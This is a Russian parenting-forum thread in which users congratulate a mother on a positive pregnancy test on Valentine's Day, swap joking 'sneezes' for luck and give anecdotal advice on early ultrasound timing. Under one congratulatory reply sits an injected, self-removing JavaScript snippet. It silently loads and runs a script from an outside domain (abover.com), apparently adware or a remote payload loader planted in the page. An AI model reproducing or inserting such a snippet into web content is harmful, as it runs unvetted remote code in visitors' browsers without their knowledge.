Войти
Мама двоих (5 лет, 1 год), планирую беременность Москва

Урааа!!! Вот и наши красоточки!!!

Мама девочки (11 лет) Орехово-Зуево

super_smilies082.gif ПОЗДРАВЛЯЮ!!! super_smilies082.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Заражаю и вас! Аааааааааппппппччччччииииииииххх!

0
14.02.2014
Мама девочки (11 лет) Орехово-Зуево

Да я уже зараженная angel.gif

0
15.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Ааа вижу)) тогда значёк планирования убирайте big_smiles_166.gif

0
15.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Ии Поздравляю! Берегите себя и своего малыша! super_smilies086.gif

0
15.02.2014
Мама двоих (16 лет, 24 года) Москва

СУПЕРПОДАРОК НА ДЕНЬ СВЯТОГО ВАЛЕНТИНА))))ПОЗДРАВЛЯЕМ)

[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Даааа, о таком подарке я и мечтала! СПАСИБО! big_smiles_166.gif

0
14.02.2014
Мама мальчика (10 лет) Николаев (Николаевская обл.)

Супер подарок!!!! Поздравлю вас!!! super_smilies082.gifsuper_smilies082.gifsuper_smilies086.gif Здоровья вам и вашему малышу!!!!   Принимаю ваш чих, с большой надеждой!!!

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Да, сегодня в праздник самые заразные чихи! И еще раз аааааааааааааппппппппччччиииииииииххх на вас!

0
14.02.2014
Мама мальчика (10 лет) Николаев (Николаевская обл.)
пчих приняла)))
0
14.02.2014
Мама мальчика (18 лет) Калининград

Поздравляю, да на самом деле очень красивые полосочки!!!!!!Здоровья вам и малышу!!!!!! super_smilies086.gif

А чих я поймала, буду заражаться!!!! big_smiles_127.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Будем беречься! И на последок слюнявый мой аааааааааппппчииииииххх! super_smilies086.gif

0
14.02.2014
Мама мальчика (18 лет) Калининград

Поймала ваш заразнючих чиххххххххххх, заражаюсь!!!!!!!!! super_smilies086.gif  Спасибо!!!!

0
14.02.2014

красотааааа)))  big_smiles_278.gifпоздравляю!!!спасибо что узнали ...что мы все станем мамочками))это вдохновляет! ловлю чих с надеждой 20 февраля увидеть свои //) 

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо!! Да,да за нас всех узнавала! скоро, совсем скоро увидете свои заветные// in_love.gif

0
14.02.2014

спасибо))) super_smilies082.gif

0
15.02.2014
Мама мальчика (11 лет) Москва

Тихоооонечко поздравляю!

Наслаждайтесь этим чудным временем! Легкой беременности) Чихните на меня позаразнее, пожалуйста)))))

Ах, да, и легких родов конечно)))

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибооооо! Ааааааааааааппппппппппчччччччччииииииихх слюнявый и заразный! kisses.gif

0
14.02.2014
Мама мальчика (11 лет) Москва

поймала со всеми слюнями))))))))) спасибо огромное) берегите себя)

0
15.02.2014
Мама четырех (от 6 лет до 23 года) Архипо-Осиповка

Что  могу сказать....Дак это ж красота неописумая))))))))))Здоровья вам!!!!!!!!!ad0296f4cd17.jpg

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Буду беречь себя и бусю! На вас заразный призоразный и самый слюнявый ааааааааааапппппчччииииииихх! super_smilies094.gif

0
14.02.2014
Мама четырех (от 6 лет до 23 года) Архипо-Осиповка

У меня уже полон амбар чихов))) big_smiles_162.gif Ну что надеюсь втотой год планирования будет удачным))017f23a01c1d.gif

0
14.02.2014
Мама двоих (11 лет, 9 лет) Пермь

ааа, клёво!!!!!!!! поздравляю!!!!!!!!!  super_smilies082.gif спасибо за чих, пусть он будет именно тот  super_smilies086.gif легкой Б, здоровья огромного! 

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! И на вас персональный ааааааааааапппппппччччиииииихх! super_smilies086.gif

0
14.02.2014
Мама двоих (11 лет, 9 лет) Самара

Поздравляю вас!!! Отличный подарочек на 14 февраля! super_smilies094.gif

 Я на узи ходила в 5 недель от М, еще раз пойду в 7 недель. Многие советуют наоборот, позже ходить, но мне врач сказала что и в 5 недель можно, чтобы убедиться что Б маточная. 

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо!  big_smiles_166.gif

0
14.02.2014
Мама двоих (23 года, 7 лет) Южно-Сахалинск

Класс!!! Поздравляю от души)))))

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Вам тоже скорейших// super_smilies086.gif

0
14.02.2014
Мама двоих (23 года, 7 лет) Южно-Сахалинск

kisses.gif спасибо, чих поймала)))

0
14.02.2014
Мама мальчика (10 лет) Макеевка

Поздравляю Вас от всего сердца. Легкой и благополучной беременности! Пускай пузожитель развивается и растет здоровеньким!! super_smilies082.gif  Спасибо за чих и прогнозы!))

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

И Вам спасииибо! kisses.gif

0
14.02.2014
Мама двоих (11 лет, 7 лет), планирую беременность Мельбурн
Поздравляю! Отличный подарок ко дню влюбленных! super_smilies082.giflove.gif
Легкой вам б!
0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Желаю и Вам такого подарочка в ближайшее время! super_smilies086.gif

0
14.02.2014

За чих спасибо, словила и заразилась!!!

А Вас поздравляю с одним из самых прекрасных периодов в Вашей жизни!!!

super_smilies082.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! super_smilies086.gif

0
14.02.2014
Мама девочки (17 лет) Москва

super_smilies082.gif Поздравляю!!!!!!!! baby.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! kisses.gif

0
14.02.2014
Мама мальчика (17 лет), планирую беременность Москва

Поздравляем, легкой беременности! У меня о как раз на день влюбленных, теперь ждем,надеемся и верим, лювлю чих)))

0
16.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! super_smilies086.gif

0
16.02.2014
Мама двоих (18 лет, 9 лет)

Поздравляю!!!!Здоровья Вам и Вашим малышам!!!!! 129.gif

На УЗИ в 5,5 - 6 недель, не ранее. Так советует мой Г.

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Так и сделаю! kisses.gif

0
14.02.2014
Мама двоих (16 лет, 11 лет) Волгоград

Поздравляю!!!Легкой беременности!На УЗИ для подтверждения думаю через недельку нужно, мне с первым как раз все подтвердили на таком же сроке!

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Да, я уже тоже подумала для подтвержения сделать. big_smiles_166.gif

0
14.02.2014
Мама мальчика (11 лет) Одесса

Поздравляю!)Лёгкой беременности!!!
Я ходила на узи через 2,5 недели как тест показал //..тогда уже и бусинку нашу видно было и сердцебиение)

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! И я сделаю нед через 2-3 если вытерплю) big_smiles_166.gif

0
14.02.2014
Мама двоих (11 лет, 10 лет) Иркутск

Поздравляю!!! Легкой Б и здоровья Вам и Вашей Бусинке)))  big_smiles_127.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Заражайтесь- ааааааааааааппппппчччччиииииииииихх!

0
14.02.2014
Мама мальчика (16 лет) Кириши

Поздрпвляю!!!!,На Узи не торопитесь....если ни чего не беспокоит....6-7недель уже можно идти.

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо!дай бог всё будет хорошо, так и сходим, в этот раз не хочу торопиться вставать на учёт!

0
14.02.2014
Мама двоих (10 лет, 4 года) Брянск

Поздравляю растите большими!!! А мы от вас заразимся  beaten.gif

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! Будем стараться)

0
14.02.2014
планирую беременность Алма-Ата (Алматы)

love.gifdenis02.gifchild_2002.gif

0
14.02.2014
Мама мальчика (11 лет)

Чих ловлю, а Вас поздравляю!!! Лёгкой беременности и здоровья Вам и малышу!!! super_smilies082.gif

0
14.02.2014
планирую беременность Москва

Поздравляю!!!!!!!!!!!!!!!

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! И на вас аааааааапппппппччсчииииииииииииххх!

0
14.02.2014
планирую беременность Москва

ой, с радостью приму Ваш чих)) super_smilies086.gif

0
14.02.2014
Мама четырех (от 9 лет до 29 лет) Тарко-Сале

Ура!! Красота!! Чих поймала!!!

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо! super_smilies086.gif

0
16.02.2014
Мама двоих (15 лет, 11 лет) Могилев

поздрааааавляю!!!!!! )

0
14.02.2014
Мама четырех (от 6 лет до 17 лет) Москва

Спасибо!

0
14.02.2014
Реагент...что это за зверь? подскажите пожалуйста

Похожие записи